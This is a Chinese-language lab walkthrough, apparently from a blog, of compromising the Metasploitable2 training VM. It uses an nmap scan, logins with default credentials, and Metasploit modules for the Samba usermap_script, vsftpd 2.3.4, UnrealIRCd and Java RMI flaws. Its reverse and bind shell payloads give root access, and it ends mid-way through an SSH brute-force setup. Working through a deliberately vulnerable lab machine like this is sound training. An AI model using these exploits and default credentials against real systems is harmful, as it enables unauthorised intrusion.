admin 管理员组

文章数量: 887016

*Metasploitable2靶机渗透*

*Metasploitable2介绍*

​ Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。

*进行此次靶机练习的原因*

​ 其中存在的的诸多漏洞中,年代也是比较久远的,尽行这个实验的目的就是通过自己搭建的靶机环境熟练渗透测试的方法和流程,巩固自己的渗透思路。因此,在这次实验中会针对一个问题进行多工具多手段的操作,这并不是画蛇添足,因为每个工具每种方法都有它的长处与弊端,不要过于依赖某个工具,这会使你在今后真正的渗透测试中更加的自信。

*环境的配置*

攻击机: kali linux  ip:192.168.22.137 (ip根据个人电脑配置)

靶机 :Metasploitable2   靶机ip:192.168.22.134 (ip根据个人电脑配置) 默认账号/密码msfadmin/msfadmin

注:Metasploitable2默认开机为普通用户,不能修改IP地址。需要登录root后才可以修改IP

root用户及网络设置流程:

1、普通用户登录成功后,在命令行输入sudo passwd 2、输入两次root密码,出现successful字样即可 3、命令行输入su - root 切换到root用户 4、编辑网卡设置vim /etc/network/interface

vim /etc/network/interface

#This file describes the......
#.....
#The primary nerwork interface
auto eth0 
iface eth0 inet dhcp  本人采用的自动获取IP

#iface eth0 inet static
#address 192.168. ....
#netmask 255.255.255.0
#gateway 192.168. ....
根据实际需要选择动态或静态网络

5、重启网络 /etc/init.d/networking restart

下载链接::https://pan.baidu/s/1IRYfp-d_qQ9kfcsdK5PNWw
提取码:rox3 ,解压后可直接使用

实验

使用nmap进行信息收集

┌──(root💀kali)-[~]
└─# nmap -T4 -A -v 192.168.22.134 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-05 18:08 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating ARP Ping Scan at 18:08
Scanning 192.168.22.134 [1 port]
Completed ARP Ping Scan at 18:08, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.03s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 192.168.22.134 [1000 ports]
Discovered open port 25/tcp on 192.168.22.134
Discovered open port 139/tcp on 192.168.22.134
Discovered open port 80/tcp on 192.168.22.134
Discovered open port 5900/tcp on 192.168.22.134
Discovered open port 21/tcp on 192.168.22.134
Discovered open port 22/tcp on 192.168.22.134
Discovered open port 3306/tcp on 192.168.22.134
Discovered open port 23/tcp on 192.168.22.134
Discovered open port 111/tcp on 192.168.22.134
Discovered open port 53/tcp on 192.168.22.134
Discovered open port 445/tcp on 192.168.22.134
Discovered open port 6667/tcp on 192.168.22.134
Discovered open port 1099/tcp on 192.168.22.134
Discovered open port 8180/tcp on 192.168.22.134
Discovered open port 2049/tcp on 192.168.22.134
Discovered open port 2121/tcp on 192.168.22.134
Discovered open port 5432/tcp on 192.168.22.134
Discovered open port 513/tcp on 192.168.22.134
Discovered open port 514/tcp on 192.168.22.134
Discovered open port 8009/tcp on 192.168.22.134
Discovered open port 6000/tcp on 192.168.22.134
Discovered open port 512/tcp on 192.168.22.134
Discovered open port 1524/tcp on 192.168.22.134
Completed SYN Stealth Scan at 18:08, 0.14s elapsed (1000 total ports)
Initiating Service scan at 18:08
Scanning 23 services on 192.168.22.134
Completed Service scan at 18:08, 11.05s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.22.134
NSE: Script scanning 192.168.22.134.
Initiating NSE at 18:08
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 9.80s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.51s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 192.168.22.134
Host is up (0.00092s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.22.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: 2021-02-05T10:08:57+00:00; +14s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      40160/udp   mountd
|   100005  1,2,3      44798/tcp   mountd
|   100021  1,3,4      33803/udp   nlockmgr
|   100021  1,3,4      40110/tcp   nlockmgr
|   100024  1          39847/udp   status
|_  100024  1          53367/tcp   status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 18
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, Support41Auth, ConnectWithDatabase, SupportsCompression
|   Status: Autocommit
|_  Salt: XE3nQ-*).Lry-pnYRmN|
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-02-05T10:08:57+00:00; +15s from scanner time.
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 3:59:11
|   source ident: nmap
|   source host: 82B328E6.3BA08CB1.FFFA6D49.IP
|_  error: Closing Link: livdnmifj[192.168.22.137] (Quit: livdnmifj)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:DD:32:05 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.163 days (since Fri Feb  5 14:13:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h15m14s, deviation: 2h30m00s, median: 13s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2021-02-05T05:08:48-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.92 ms 192.168.22.134

NSE: Script Post-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.98 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)

弱口令漏洞

原理:系统或者数据库的登陆用户,密码简单或者用户名相同,容易通过暴力破解的手段来获取密 码。

影响范围:所有使用用户名/密码登陆的系统和软件都有可能存在此问题

1、系统弱口令漏洞——22端口开放(22端口:SSH远程登录协议)

在kali中输入telnet 192.168.22.134 login/password:msfadmin/msfadmin

此实验需要事前安装telnet,安装步骤如下

┌──(root💀kali)-[~]
└─# apt-get install telnetd
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
下列【新】软件包将被安装:
  telnetd
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 1257 个软件包未被升级。
需要下载 44.9 kB 的归档。
......
......

┌──(root💀kali)-[~]
└─# apt-get install xinetd                                                           100 ⨯
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
下列软件包是自动安装的并且现在不需要了:
  tcpd
使用'apt autoremove'来卸载它(它们)。
下列软件包将被【卸载】:
  inetutils-inetd
下列【新】软件包将被安装:
......
......

┌──(root💀kali)-[~]
└─# vim /etc/inetd.conf
...
#daytime		stream	tcp6	nowait	root	internal
#time		stream	tcp6	nowait	root	internal

#:STANDARD: These are standard services.
安装完毕后,系统会在/etc/inetd.conf加上这行信息,如果没有手动添加
telnet		stream	tcp	nowait	telnetd	/usr/sbin/tcpd	/usr/sbin/in.telnetd

#:BSD: Shell, login, exec and talk are BSD protocols.
...

┌──(root💀kali)-[~]
└─# vim /etc/xinetd.d/telnet 系统中并没有这个文件,编辑自动生成即可
# default: on

# description: The telnet server serves telnet sessions; it uses /

#       unencrypted username/password pairs for authentication.

service telnet

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = root

        server          = /usr/sbin/in.telnetd

        server_args     = -h

        log_on_failure  += USERID
}

┌root💀kali)-[~]
└─#  /etc/init.d/xinetd restart                                                       
Restarting xinetd (via systemctl): xinetd.service.
┌──(root💀kali)-[~]
└─# apt-get install telnet     
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
下列软件包是自动安装的并
...
...
安装完成,可以进行实验了
┌──(root💀kali)-[~]
└─# telnet 192.168.22.134
Trying 192.168.22.134...
Connected to 192.168.22.134.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password: 
Last login: Fri Feb  5 01:39:28 EST 2021 from 192.168.22.129 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ pwd
/home/msfadmin
成功登录远程靶机

2、MySQL弱密码登录——3306端口开放(3306端口:MySQL开放此端口)

┌──(root💀kali)-[~]
└─# mysql -h 192.168.22.134                                                         
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 26
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)

MySQL [(none)]> 
成功登录对方MySQL数据库

3、PostgreSQL弱密码登录——端口5432开放(5432端口:PostgreSQL数据库)

┌──(root💀kali)-[~]
└─# psql -h 192.168.22.134 -U postgres                                                 2 ⨯
用户 postgres 的口令:postgres
psql (13.0 (Debian 13.0-4), 服务器 8.3.1)
输入 "help" 来获取帮助信息.

postgres=# 
使用\q 退出.
postgres-# \q

成功登录对方PostgreSQL数据库

4、VNC弱密码登录——端口5900开放(5900端口:虚拟网络计算机显示0;5901–1;5902–2;5903–3)

┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密码为password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
...
...


postgres=# 
使用\q 退出.
postgres-# \q

成功登录对方PostgreSQL数据库

4、VNC弱密码登录——端口5900开放(5900端口:虚拟网络计算机显示0;5901–1;5902–2;5903–3)

┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密码为password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
...
...

5、FTP弱口令登录

使用kali自带的爆破工具(hydra)进行爆破一下


6、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

影响的系统/软件:

Xerox WorkCentre Pro

Xerox WorkCentre

VMWare ESX Server

Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI

Trustix Secure Linux

SUSE Linux Enterprise

Sun Solaris

Slackware Linux

RedHat Enterprise

Mandriva Linux

启动Metasploit
┌──(root💀kali)-[~]
└─# msfconsole 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

搜索有关samba漏洞的代码库 search samba
msf6 > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description         
   -   ----                                                 ---------------  ----       -----  -----------         
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal                                                                                                      
...
...
   12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
...
...
使用usermap_script代码 use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat

查看攻击载荷 show payloads 并选择bind_netcat即使用netcat工具在渗透攻击成功后执行shell并通过netcat绑定在一个监听端口上
msf6 exploit(multi/samba/usermap_script) > show payloads 

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   cmd/unix/bind_netcat_gaping
   ...
   ...
   
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat

查看参数配置 show options 设置目标ip、port等参数 set RHOST 192.168.22.134
msf6 exploit(multi/samba/usermap_script) > show options 

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set rhost 192.168.22.134
rhost => 192.168.22.134

执行exploit/run获得shell
msf6 exploit(multi/samba/usermap_script) > run

[*] Started bind TCP handler against 192.168.22.134:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.22.134:4444) at 2021-02-06 11:50:12 +0800

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
......

7、Vsftpd源码包含后门漏洞——开放着21端口,并且vsftpd版本号为2.3.4

原理: 在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码

影响软件:Vsftpd server v2.3.4

启动Metsploit 搜索关于Vsftpd的了漏洞代码库 search vsftpd
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

使用代码 use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact

查看需要设置的参数 show options 设置个目标IP即可, set RHOST 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.22.134:21 - The port used by the backdoor bind listener is already open
[+] 192.168.22.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.22.134:6200) at 2021-02-06 12:09:20 +0800

whoami
root
成功拿下对方shell

8、UnreallRCd后门漏洞

原理: 在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

影响系统/软件:Unreal UnreallRCd3.2.8.1

在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和攻击载荷。
msf6 > search unreal ircd

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

在终端中输入命令“use exploit/unix/irc/unre ircd 3281backdoor”,启用漏洞利用模块。
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 

在终端中输入命令“show options",查看需要设置的相关项,“yes” 表示必须填写的参数。
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


接下来在终端中输入命令“set RHOST 【靶机ip】”,设置目标主机的IP地址
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.22.134:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
此处提示没有选择payload,手动设置payload
设置payload及lhost(攻击端IP)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 192.168.22.137
lhost => 192.168.22.137

执行攻击exploit/run
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP handler on 192.168.22.137:4444 
[*] 192.168.22.134:6667 - Connected to 192.168.22.134:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.22.134:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.22.137:4444 -> 192.168.22.134:59370) at 2021-02-06 12:32:48 +0800

whoami
root
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:dd:32:05  
          inet addr:192.168.22.134  Bcast:192.168.22.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fedd:3205/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500 
          ......
          

9、Java RMI SERVER命令执行漏洞——1099端口开放

启动metasploit 在终端中输入命令“search java_rmi_server”,搜索RMI的相关工具和攻击载荷。
msf6 > search java_rmi_server

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  auxiliary/scanner/misc/java_rmi_server  2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   1  exploit/multi/misc/java_rmi_server      2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/misc/java_rmi_server

在终端中输入命令“use exploit/multi/misc/java_rmi_server”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
msf6 > use exploit/multi/misc/java_rmi_server 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp

在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
msf6 exploit(multi/misc/java_rmi_server) > show options 

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.22.137   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

在终端中输入命令“set RHOST 192.168.22.134”,设置目标主机的IP地址。
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.22.134
rhosts => 192.168.22.134

在终端中输入“exploit”, 实施攻击,攻击成功后,建立连接会话。
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.22.137:4444 
[*] 192.168.22.134:1099 - Using URL: http://0.0.0.0:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Local IP: http://192.168.22.137:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Server started.
[*] 192.168.22.134:1099 - Sending RMI Header...
[*] 192.168.22.134:1099 - Sending RMI Call...
[*] 192.168.22.134:1099 - Replied to request for payload JAR
[*] Sending stage (58125 bytes) to 192.168.22.134
[*] Meterpreter session 2 opened (192.168.22.137:4444 -> 192.168.22.134:50234) at 2021-02-06 12:55:37 +0800
[*] 192.168.22.134:1099 - Server stopped.
meterpreter > ls
Listing: /
==========

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:33 +0800  bin
40666/rw-rw-rw-   1024     dir   2012-05-14 11:36:28 +0800  boot
......

meterpreter > ifconfig 
Interface  1
============
Name         : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::


Interface  2
============
Name         : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.22.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fedd:3205
IPv6 Netmask : ::

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.22.134 - Meterpreter session 2 closed.  Reason: User exit

10、Tomcat 管理台默认口令漏洞——开放8180端口并且运行着ApacheTomcat/CoyoteJSP engine1.1

原理: Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell。

影响系统/软件:Tomcat

1、访问192.168.22.134:8180,选择Tomcat Manager


2、后面需要上传木马拿webshell,俺还不会用,等研究会了再继续

11、Root用户弱口令漏洞(SSH爆破)——开启着22端口ssh服务

启动MSF终端,在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷。
msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > 

在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
